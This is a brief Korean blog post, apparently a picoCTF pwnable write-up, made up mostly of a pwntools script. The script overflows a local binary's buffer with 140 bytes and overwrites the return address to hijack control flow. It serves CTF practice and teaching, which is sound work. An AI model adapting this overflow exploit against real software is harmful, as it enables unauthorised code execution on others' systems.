음...그냥 버퍼오버플로우다!! ㅎㅎ...
이것도 못풀면..ㅎㅎ...
음 버퍼오버플로우...ㅎㅎ...
from pwn import *
p = process("./rop")
payload = "A"*140
payload += p32(0x080484a4)
p.sendline(payload)
p.interactive()
익스 완료~
'CTF > Picoctf' 카테고리의 다른 글
picoctf pwnable_NewOverFlow Write up (0) | 2019.10.22 |
---|---|
picoctf pwnable_rop_3 Write up (0) | 2019.10.20 |
picoctf pwnable_rop_2 Write up (0) | 2019.10.20 |